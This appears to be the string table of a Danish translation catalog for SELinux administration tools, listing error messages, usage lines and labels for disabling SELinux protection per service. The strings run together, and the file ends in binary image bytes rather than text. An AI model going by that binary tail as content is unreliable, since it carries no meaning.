Kunne ikke starte en semanage-forbindelseKunne ikke finde nøgle for %sKunne ikke liste SELinux-modulerKunne ikke liste SELinux-brugereKunne ikke liste adresserKunne ikke liste booleskerKunne ikke liste filkontekstKunne ikke liste grænsefladerKunne ikke liste lokale filkonteksterKunne ikke liste indlogningstilknytningerKunne ikke liste porteKunne ikke liste roller for bruger %sKunne ikke liste filkonteksterKunne ikke liste porteneKunne ikke ændre SELinux-bruger %sKunne ikke ændre adresse %sKunne ikke ændre boolesk %sKunne ikke ændre filkontekst for %sKunne ikke ændre grænseflade %sKunne ikke ændre indlogningstilknytning for %sKunne ikke ændre port %s/%sKunne ikke åbne filen %s
Kunne ikke forespørge adresse %sKunne ikke forespørge filkontekst %sKunne ikke forespørge filkontekst for %sKunne ikke spørge grænseflade %sKunne ikke forespørge port %s/%sKunne ikke forespørge seuser om %sKunne ikke forespørge bruger om %sKunne ikke fjerne tilladelsesdomæne %s (fjernelse fejlede)Kunne ikke indstille MLS-niveau for %sKunne ikke indstille MLS-interval for %sKunne ikke indstille SELinux-bruger for %sKunne ikke indstille aktiv værdi af boolesk %sKunne ikke indstille adressekontekst for %sKunne ikke sætte kørselskontekst til %s.
Kunne ikke indstille filkontekst for %sKunne ikke indstille grænsefladekontekst for %sKunne ikke indstille maske for %sKunne ikke indstille meddelelseskontekst for %sKunne ikke indstille MLS-felter i adressekontekst for %sKunne ikke indstille MLS-felter i filkontekst for %sKunne ikke indstille MLS-felter i grænsefladekontekst for %sKunne ikke indstille MLS-felter i portkontekst for %s/%sKunne ikke indstille navn for %sKunne ikke indstille tilladelsesdomæne %s (installation af modul fejlede)Kunne ikke indstille portkontekst for %s/%sKunne ikke indstille rolle i adressekontekst for %sKunne ikke indstille rolle i filkontekst for %sKunne ikke indstille rolle i grænsefladekontekst for %sKunne ikke indstille rolle i portkontekst for %s/%sKunne ikke indstille type i adressekontekst for %sKunne ikke indstille type i filkontekst for %sKunne ikke indstille type i grænsefladekontekst for %sKunne ikke indstille type i portkontekst for %s/%sKunne ikke indstille bruger i adressekontekst for %sKunne ikke indstille bruger i filkontekst for %sKunne ikke indstille bruger i grænsefladekontekst for %sKunne ikke indstille bruger i portkontekst for %s/%sKunne ikke starte semanage-transaktionKunne ikke teste MLS-aktiveret statusKunne ikke hente standardtype.
Opret/Manipulér midlertidige filer i /tmpCronNuværende tvangstilstandTilpassetDBUS-systemdæmonDatabaserSlet %sSlet filkontekstSlet netværksportSlet SELinux-brugertilknytningSlet brugerBeskrivelseDeaktivér revisionssporDeaktivér SELinux-beskyttelse for Cluster-serverDeaktivér SELinux-beskyttelse for EvolutionDeaktivér SELinux-beskyttelse for Hal-tjenesteDeaktivér SELinux-beskyttelse for NIS-adgangskodetjenesteDeaktivér SELinux-beskyttelse for NIS-overførselstjenesteDeaktivér SELinux-beskyttelse for NetworkManagerDeaktivér SELinux-beskyttelse for ThunderbirdDeaktivér SELinux beskyttelse for acct-tjenesteDeaktivér SELinux-beskyttelse for amandaDeaktivér SELinux-beskyttelse for amavisDeaktivér SELinux-beskyttelse for apmd-tjenesteDeaktivér SELinux-beskyttelse for arpwatch-tjenesteDeaktivér SELinux-beskyttelse for auditd-tjenesteDeaktivér SELinux-beskyttelse for automount-tjenesteDeaktivér SELinux-beskyttelse for avahiDeaktivér SELinux-beskyttelse for bluetooth-tjenesteDeaktivér SELinux-beskyttelse for canna-tjenesteDeaktivér SELinux-beskyttelse for cardmgr-tjenesteDeaktivér SELinux-beskyttelse for ciped-tjenesteDeaktivér SELinux-beskyttelse for clamd-tjenesteDeaktivér SELinux-beskyttelse for clamscanDeaktivér SELinux-beskyttelse for clvmdDeaktivér SELinux-beskyttelse for comsat-tjenesteDeaktivér SELinux-beskyttelse for courier-tjenesteDeaktivér SELinux-beskyttelse for cpucontrol-tjenesteDeaktivér SELinux-beskyttelse for cpuspeed-tjenesteDeaktivér SELinux-beskyttelse for crond-tjenesteDeaktivér SELinux-beskyttelse for cups hplip-tjenesteDeaktivér SELinux-beskyttelse for cupsd-backend-serverDeaktivér SELinux-beskyttelse for cupsd-tjenesteDeaktivér SELinux-beskyttelse for cupsd_lpdDeaktivér SELinux-beskyttelse for cvs-tjenesteDeaktivér SELinux-beskyttelse for cyrus-tjenesteDeaktivér SELinux-beskyttelse for dbskkd-tjenesteDeaktivér SELinux-beskyttelse for dbusd-tjenesteDeaktivér SELinux-beskyttelse for dccdDeaktivér SELinux-beskyttelse for dccifdDeaktivér SELinux-beskyttelse for dccmDeaktivér SELinux-beskyttelse for ddt-tjenesteDeaktivér SELinux-beskyttelse for devfsd-tjenesteDeaktivér SELinux-beskyttelse for dhcpc-tjenesteDeaktivér SELinux-beskyttelse for dhcp-tjenesteDeaktivér SELinux-beskyttelse for dictd-tjenesteDeaktivér SELinux-beskyttelse for distccd-tjenesteDeaktivér SELinux-beskyttelse for dmesg-tjenesteDeaktivér SELinux-beskyttelse for dnsmasq-tjenesteDeaktivér SELinux-beskyttelse for dovecot-tjenesteDeaktivér SELinux-beskyttelse for etropyd-tjenesteDeaktivér SELinux-beskyttelse for fetchmailDeaktivér SELinux-beskyttelse for fingerd-tjenesteDeaktivér SELinux-beskyttelse for freshclam-tjenesteDeaktivér SELinux-beskyttelse for fsdaemon-tjenesteDeaktivér SELinux-beskyttelse for spilDeaktivér SELinux-beskyttelse for gpm-tjenesteDeaktivér SELinux-beskyttelse for gss-tjenesteDeaktivér SELinux-beskyttelse for hostname-tjenesteDeaktivér SELinux-beskyttelse for hotplug-tjenesteDeaktivér SELinux-beskyttelse for howl-tjenesteDeaktivér SELinux-beskyttelse for http-suexecDeaktivér SELinux-beskyttelse for httpd rotatelogsDeaktivér SELinux-beskyttelse for hwclock-tjenesteDeaktivér SELinux-beskyttelse for i18n-tjenesteDeaktivér SELinux-beskyttelse for imazesrv-tjenesteDeaktivér SELinux-beskyttelse for inetd-undertjenesterDeaktivér SELinux-beskyttelse for inetd-tjenesteDeaktivér SELinux-beskyttelse for innd-tjenesteDeaktivér SELinux-beskyttelse for iptables-tjenesteDeaktivér SELinux-beskyttelse for ircd-tjenesteDeaktivér SELinux-beskyttelse for irqbalance-tjenesteDeaktivér SELinux-beskyttelse for iscsi-tjenesteDeaktivér SELinux-beskyttelse for jabberd-tjenesteDeaktivér SELinux-beskyttelse for kadmind-tjenesteDeaktivér SELinux-beskyttelse for klogd-tjenesteDeaktivér SELinux-beskyttelse for krb5kdc-tjenesteDeaktivér SELinux-beskyttelse for ktalk-tjenesterDeaktivér SELinux-beskyttelse for kudzu-tjenesteDeaktivér SELinux-beskyttelse for locate-tjenesteDeaktivér SELinux-beskyttelse for lpd-tjenesteDeaktivér SELinux-beskyttelse for lrrd-tjenesteDeaktivér SELinux-beskyttelse for lvm-tjenesteDeaktivér SELinux-beskyttelse for mailmanDeaktivér SELinux-beskyttelse for mdadm-tjenesteDeaktivér SELinux-beskyttelse for monopd-tjenesteDeaktivér SELinux-beskyttelse for mrtg-tjenesteDeaktivér SELinux-beskyttelse for mysqld-tjenesteDeaktivér SELinux-beskyttelse for nagios-tjenesteDeaktivér SELinux-beskyttelse for named-tjenesteDeaktivér SELinux-beskyttelse for nessusd-tjenesteDeaktivér SELinux-beskyttelse for nfsd-tjenesteDeaktivér SELinux-beskyttelse for nmbd-tjenesteDeaktivér SELinux-beskyttelse for nrpe-tjenesteDeaktivér SELinux-beskyttelse for nscd-tjenesteDeaktivér SELinux-beskyttelse for nst-tjenesteDeaktivér SELinux-beskyttelse for ntpd-tjenesteDeaktivér SELinux-beskyttelse for oddjobDeaktivér SELinux-beskyttelse for oddjob_mkhomedirDeaktivér SELinux-beskyttelse for openvpn-tjenesteDeaktivér SELinux-beskyttelse for PAM-tjenesteDeaktivér SELinux-beskyttelse for pegasusDeaktivér SELinux-beskyttelse for perdition-tjenesteDeaktivér SELinux-beskyttelse for portmap-tjenesteDeaktivér SELinux-beskyttelse for portslave-tjenesteDeaktivér SELinux-beskyttelse for postfixDeaktivér SELinux-beskyttelse for postgresql-tjenesteDeaktivér SELinux-beskyttelse for pptpDeaktivér SELinux-beskyttelse for prelink-tjenesteDeaktivér SELinux-beskyttelse for privoxy-tjenesteDeaktivér SELinux-beskyttelse for ptal-tjenesteDeaktivér SELinux-beskyttelse for pxe-tjenesteDeaktivér SELinux-beskyttelse for pyzordDeaktivér SELinux-beskyttelse for quota-tjenesteDeaktivér SELinux-beskyttelse for radiusd-tjenesteDeaktivér SELinux-beskyttelse for radvd-tjenesteDeaktivér SELinux-beskyttelse for rdiscDeaktivér SELinux-beskyttelse for readaheadDeaktivér SELinux-beskyttelse for restorecondDeaktivér SELinux-beskyttelse for rhgb-tjenesteDeaktivér SELinux-beskyttelse for ricciDeaktivér SELinux-beskyttelse for ricci_modclusterdDeaktivér SELinux-beskyttelse for rlogind-tjenesteDeaktivér SELinux-beskyttelse for rpcd-tjenesteDeaktivér SELinux-beskyttelse for rshdDeaktivér SELinux-beskyttelse for rsync-tjenesteDeaktivér SELinux-beskyttelse for saslauthd-tjenesteDeaktivér SELinux-beskyttelse for scannerdaemon-tjenesteDeaktivér SELinux-beskyttelse for sendmail-tjenesteDeaktivér SELinux-beskyttelse for setransDeaktivér SELinux-beskyttelse for setroubleshoot-tjenesteDeaktivér SELinux-beskyttelse for slapd-tjenesteDeaktivér SELinux-beskyttelse for slrnpull-tjenesteDeaktivér SELinux-beskyttelse for smbd-tjenesteDeaktivér SELinux-beskyttelse for snmpd-tjenesteDeaktivér SELinux-beskyttelse for snort-tjenesteDeaktivér SELinux-beskyttelse for sound-tjenesteDeaktivér SELinux-beskyttelse for soundd-tjenesteDeaktivér SELinux-beskyttelse for spamd-tjenesteDeaktivér SELinux-beskyttelse for speedmgmt-tjenesteDeaktivér SELinux-beskyttelse for squid-tjenesteDeaktivér SELinux-beskyttelse for ssh-tjenesteDeaktivér SELinux-beskyttelse for stunnel-tjenesteDeaktivér SELinux-beskyttelse for swat-tjenesteDeaktivér SELinux-beskyttelse for sxid-tjenesteDeaktivér SELinux-beskyttelse for syslogd-tjenesteDeaktivér SELinux-beskyttelse for system cron-jobDeaktivér SELinux-beskyttelse for tcp-tjenesteDeaktivér SELinux-beskyttelse for telnet-tjenesteDeaktivér SELinux-beskyttelse for tftpd-tjenesteDeaktivér SELinux-beskyttelse for webbrowsereDeaktivér SELinux-beskyttelse for transproxy-tjenesteDeaktivér SELinux-beskyttelse for udev-tjenesteDeaktivér SELinux-beskyttelse for uml-tjenesteDeaktivér SELinux-beskyttelse for updfstab-tjenesteDeaktivér SELinux-beskyttelse for uptimed-tjenesteDeaktivér SELinux-beskyttelse for uupcd-tjenesteDeaktivér SELinux-beskyttelse for vmware-tjenesteDeaktivér SELinux-beskyttelse for watchdog-tjenesteDeaktivér SELinux-beskyttelse for windbind-tjenesteDeaktivér SELinux-beskyttelse for xdm-tjenesteDeaktivér SELinux-beskyttelse for xen-kontrolDeaktivér SELinux-beskyttelse for xen-tjenesteDeaktivér SELinux-beskyttelse for xfs-tjenesteDeaktivér SELinux-beskyttelse for ypbind-tjenesteDeaktivér SELinux-beskyttelse for ypserv-tjenesteDeaktiveretDeaktiveret
Tolerant
Gennemtving
Tillad ikke nogen processer at indlæse kernemodulerTillad ikke nogen processer at ændre kerne-SELinux-regelsætTillad ikke overførsler til sysadm_t, sudo and su berørtGennemgå ikke ting, som vi ved er i stykker, men som ikke er sikkerhedsfarligeRedigér netværksportAktivér revisionssporAktivér/deaktivér ekstra revisionsregler, som ikke normalt er rapporteret i logfilerne.GennemtvingIndtast fuld sti til kørbar som skal begrænses.Indtast fuld sti til init-skript som bruges til at starte det begrænsede program.Indtast unikt navn for den begrænsede program- eller brugerrolle.Fejl ved allokering afhukommelse.
Fejl ved allokering af skallens argv0.
Fejl ved skift af UID, afbryder.
Fejl ved forbindelse til revisionssystem.
Fejl ved fjernelse af SETUID-egenskab, afbryder
Fejl ved fjernelse af egenskaber, afbryder
Fejl ved frigivelse af caps
Fejl ved initialisering af egenskaber, afbryder.
Fejl ved nulstilling af KEEPCAPS, afbryder
Fejl ved afsendelse af revisionsmeddelelse.
Fejl ved indstilling af KEEPCAPS, afbryder
Fejl ved indstilling af egenskaber, afbryder.
Fejl!  Kunne ikke åbne %s.
Fejl!  Skallen er ugyldig.
Fejl: flere niveauer angivet
Fejl: flere roller angivet
Fejl: flere typer angivet
Fejl: du har ikke tilladelse til at ændre niveauer fra en usikker terminal 
KørbarEksisterende brugerrollerEksisterende _brugerKunne ikke lukke tty ordentligt
Fil
angivelseFil
typeFilkontekst-filFilmærkningFilangivelseFiltypeFilkontekst for %s er defineret i regelsæt, kan ikke slettesFilkontekst for %s er ikke defineretFilterGPLSpilGenerér nyt regelsætmodulGruppevisningHTTPD-tjenesteInit-skriptInteragerer med terminalenGrænseflade %s er defineret i regelsæt, kan ikke slettesGrænsefladen %s er ikke defineretGrænseflade-filInternet-tjenester-dæmon (inetd)Internet-tjenester-dæmon er tjenester som startes af xinetdUgyldig filangivelseKerberosMærkningLinux-gruppe %s findes ikkeLinux-bruger %s findes ikkeListevisningIndlæs regelsætmodulKan ikke indlæse regelsætlagerLuk ned...Logind
navnLogind "%s" er påkrævetLogindnavnIndlogningstilknytning for %s er defineret i regelsæt, kan ikke slettesIndlogningstilknytning for %s er ikke defineretMCS-niveauMCS-intervalMLSMLS/MLS/
MCS-intervalMLS/MCS
niveauMLS/MCS-intervalHukommelsesbeskyttelseMinimal terminalbrugerrolleMinimal X Windows-brugerrolleÆndr %sÆndr filkontekstÆndr SELinux-brugertilknytningÆndr brugerÆndr en eksisterende logindbrugers post.Modul %s.pp allerede indlæst i nuværende regelsæt.
Vil du fortsætte?ModulnavnMontérNFSNISNavnNavnetjenesteNetværkskonfigurationNetværksportIngen kontekst i filen %s
Knudeadresse er påkrævetKnude-netmaske er påkrævetIkke implementeret endnuTilvalgsfejl %s Løbet tør for hukommelse!
Adgangskode:TolerantPolgenRegelsætmappeRegelsætmodulPortPort %s/%s allerede defineretPort %s/%s er defineret i regelsæt, kan ikke slettesPort %s/%s er ikke defineretPortnummerPort er påkrævetPortnummer "%s" er ikke gyldigt.  0 < PORT_NUMMER < 65536 Porte skal have numre eller intervaller af numre fra 1 til %d PræfiksUdskriftProcesdomæneProtoProtokolProtokol udp eller tcp er påkrævetRed Hat 2007Ommærk ved næste genstart.Fjern indlæsbart regelsætmodulKræver mindst én kategoriKræver præfiks eller rollerKræver præfiks, roller, niveau eller intervalKræver setypeKræver setype eller serangeKræver setype, serange eller seuserKræver seuser eller serangeSæt boolesk-indstilling til systemstandardRolleRoot-administratorbrugerrolleKør boolesk-nedlukningsguideSASL-godkendelsesserverSELinux
brugerAdministration af SELinuxSELinux-grænsefladeRegelsætgenereringsværktøj til SELinuxSELinux
porttypeSELinux-porttypeSELinux-rollerTjenestebeskyttelse til SELinuxSELinux-typeSELinux-type er påkrævetSELinux-brugerSELinux booleskSELinux kontekstSELinux regelsæt er ikke håndteret, eller lager kan ikke tilgåes.SELinux-bruger %s er defineret i regelsæt, kan ikke slettesSELinux-bruger %s er ikke defineretSELinux-bruger "%s" er påkrævetSSHSambaVælg håndteringsobjektVælg porteVælg Root-administratorbrugerrolle, hvis denne bruger skal bruges til at administrere maskinen som administrator (root).  Denne bruger vil ikke være istand til at logge direkte ind i systemet.Vælg mappe til at generere regelsætfiler iVælg mappe(r) som det begrænsede program ejer eller skriver iVælg kørbar-fil som skal begrænses.Vælg fil(er) som det begrænsede program opretter eller skriverVælg hvis du vil ommærke hele filsystemet ved næste genstart.  Ommærkning kan tage meget lang tid, alt efter størrelsen på systemet.  Hvis du ændrer regelsættyper eller går fra deaktiveret til gennemtving, er en ommærkning påkrævet.Vælg init-skript-fil som skal begrænses.Vælg domænerne som du vil have denne bruger til at administrere.Vælg brugerrollerne som overføres til disse programdomæner.SELinux
filtypeSemanage-transaktion er allerede i gangSemanage-transaktion er ikke i gangSend revisionssmeddelserSender e-postIndstillingsskriptBeklager, -l skal bruges med SELinux MLS-understøttelse.
Beklager, newrole kan kun bruges på en SELinux-kerne.
Beklager, run_init kan kun bruges på en SELinux-kerne.
Beskyttelse mod spamSquidStandard init-dæmonStandard init-dæmon er tjenester som startes under opstart via init-skripter. Kræver normalt et skript i /etc/rc.d/init.dStatusTvangstilstand som systemstandardRegelsættype som systemstandard: Denne bruger kan logge ind på en maskine via X eller terminal.  Som standard vil denne bruger ikke have setuid, intet netværk, ingen sudo, ingen suDenne bruger vil kun logge ind på en maskine via en terminal eller fjernindlogning. Som standard vil denne bruger ikke have setuid, intet netværk, ingen su, ingen sudo.For at gøre denne regelsætpakke aktiv, kør:Skift mellem Tilpasset og Alle booleskSkift mellem Tilpasset og Alle porteSkift mellem alle og tilpasset filkontekstOverfør stab-SELinux-bruger til webbrowserdomæneOverfør systemadministrator-SELinux-bruger til webbrowserdomæneOverfør bruger-SELinux-bruger til webbrowserdomæneOverfør xgæste-SELinux-bruger til webbrowserdomæneType %s_t allerede defineret i nuværende regelsæt.
Vil du fortsætte?Indtast tvangsfilType er påkrævetBRUG: run_init <skript> <args ...>
  hvor: <skript> er navnet på init-skriptet som skal køres,
         <args ...> er argumenterne til dette skript.USER-typer får automatisk en tmp-typeKunne ikke allokere hukommelse for new_contextKunne ikke nulstille miljø
Kunne ikke hente tom signalsæt
Kunne ikke genetablere miljøet, afbryder
Kunne ikke genetablere tty-mærke...
Kunne ikke indstille SIGHUP-håndtering
Universel SSL-tunnelUkendt eller manglende protokolIkke reserverede porte (>1024)Brug %s -LBrug %s -L -l brugerBrug %s -d fil ...Brug %s -l -d bruger ...Brug %s -l KATEGORI bruger ...Brug %s -l [[+|-]KATEGORI],...]q bruger ...Brug %s KATEGORI fil ...Brug %s [[+|-]KATEGORI],...]q fil ...Brug -- for at afslutte tilvalgslisten.  For eksempelBrugerprogramBrugerprogram er ethvert program, som du vil begrænse som er startet af en brugerBrugertilknytningBrugerprivilegierBrugerrolleBruger med fuldt netværk, ingen setuid-programmer uden overgang, ingen su, kan bruge sudo til Root-administrationsrollerBruger med fuldt netværk, ingen setuid-programmer uden overgang, ingen sudo, ingen su.Bruger PAM til godkendelseBruger dbusBruger nnswitch eller getpw* kaldVerificér navnVersionFejl!  Kunne ikke hente tty-information.
Advarsel! Kunne ikke genetablere kontekst for %s
Internetprogram/skript (CGI)InternetprogrammerInternetprogrammer/skript (CGI) CGI-skripter startes af webserveren (apache)Skriver syslog-meddelser	XENX-serverDu skal tilføje mindst én rolle for %sDu skal indtaste en kørbarDu skal indtaste et navn for din begrænsede handling/brugerDu skal indtaste den kørbare sti til din begrænsede handlingDu skal vælge en brugerDu skal angive én af de følgende værdier: %s_Slet_Indstillingerallealle filer
standardfil
mappekarakterenhed
blokenhed
sokkel
symbolsk henvisning
navngivet kanal
godkendelse mislykkedes.
kan ikke finde gyldig indgang i passwd-filen.
chcat -- -ForretningsHemmeligt /dok/forretningsplan.odtchcat -l +ForretningsHemmeligt juserfejl ved læsning af servicekonfiguration af PAM.
kunne ikke bygge nyt interval med niveau %s
kunne ikke konvertere ny kontekst til streng
kunne ikke udføre skal
kunne ikke hente kontoinformation
kunne ikke hente ny kontekst.
kunne ikke modtage old_context.
kunne ikke initialisere PAM
kunne ikke indstille PAM_TTY
kunne ikke indstille nyt interval %s
kunne ikke indstille ny rolle %s
kunne ikke indstille ny type %s
getpass kan ikke åbne /dev/tty
globaletiket37etiket38etiket39etiket41etiket42etiket44etiket50etiket159ny rolle:  %s:  fejl på linje %lu.
newrole: fejl ved forgrening: %snewrole: forkert adgangskode for %s
ny rolle: tjenestenavnskonfiguration overløb for hashtabel
inaktivaktivpppdrsyncrun_init: forkert adgangskode for %s
system-config-selinuxKris Thomsen

Dansk-gruppen <dansk@dansk-gruppen.dk>
Mere info: http://www.dansk-gruppen.dktypeukendtbrug:  %s [-qi]
use_syslog skal være en boolesk-værdi 
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`